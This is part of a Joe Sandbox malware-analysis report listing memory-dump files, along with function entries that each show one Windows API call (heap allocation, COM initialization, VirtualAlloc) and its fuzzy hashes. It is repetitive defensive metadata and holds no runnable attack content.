Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 96b784731ecbe8da8176a3b848ab388225be180abb4d2abe2a6ced8a0f8c6c96
Instruction ID: 808a81a6dadfe2257db5b574ae22abf84930f7d716e98c2243e665e74ad34aa0
Opcode Fuzzy Hash: 96b784731ecbe8da8176a3b848ab388225be180abb4d2abe2a6ced8a0f8c6c96
Instruction Fuzzy Hash: 59C080502D03509AF13C87118C1EE17757ED7C7F47700400FD116073E7C9A000058E94

Function 00B1C69E Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00B1C6B1

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: d57b15fbdee5da710cfe29585738a1d0baa17e736ec11aa866b4cfa6826f6802
Instruction ID: 9ca5fe3070eb85792d1de789e3c26374348573507f92e756ef3e9ab4a88c0efb
Opcode Fuzzy Hash: d57b15fbdee5da710cfe29585738a1d0baa17e736ec11aa866b4cfa6826f6802
Instruction Fuzzy Hash: 3AE05E36BE070026F6384A04DC67F4422024385B62F388614B310EE3C8CCE8B401410C

Function 00B1C660 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 00B1C673

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: a6f30c7588f9211357984562da069c2b4c50085671a48ea1166e35e8e852685f
Instruction ID: fb38a3c6672565ff8f6a3fcdb7f3ddc17bbe2a5c3024e095b5ad85e6b9e69980
Opcode Fuzzy Hash: a6f30c7588f9211357984562da069c2b4c50085671a48ea1166e35e8e852685f
Instruction Fuzzy Hash: F0E02B32B9174427D2146E2CCC47F4A351B87C2327F4C82256650CB3C4ED38FD12C05A

Function 00B4BCB0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,8AD2E6E5,00B1AD76,EF9C0F8F), ref: 00B4BCCE

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ef33815935f0036b7489332ce683d12e9cb7eaebe1275217853f425e2f851e11
Instruction ID: 7612e2625f686b21a4123269c6ba3bd0ca8ede291786d5ebdefd454ea7502faf
Opcode Fuzzy Hash: ef33815935f0036b7489332ce683d12e9cb7eaebe1275217853f425e2f851e11
Instruction Fuzzy Hash: 25D01231405522EFC7101F18FC1AB963A94DF49321F1304A1B4006B1B1CAA4EC50DAD4

Function 00B4BC90 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,AC36FDA1,00B18797,2D2C008A), ref: 00B4BCA0

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3d03dff11b13b4441db2009821b0cf92dcc22c96ae43b29edcfd152b8f558756
Instruction ID: 9bcb510677dee0acf8f0aac1ac6461205ebffd0bab9d2d90907f5133883d72e6
Opcode Fuzzy Hash: 3d03dff11b13b4441db2009821b0cf92dcc22c96ae43b29edcfd152b8f558756
Instruction Fuzzy Hash: A1C04831045121AADA242B14FC09B8A7BA8AF85260F1240A1B005671B28AA0AC82AAA4

Function 06A3E979 Relevance: 1.3, APIs: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000), ref: 06A3F202

Memory Dump Source

Source File: 00000000.00000002.2163561702.0000000006A3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: true

Associated: 00000000.00000002.2163468208.0000000006A30000.00000004.00000800.00020000.00000000.sdmpDownload File
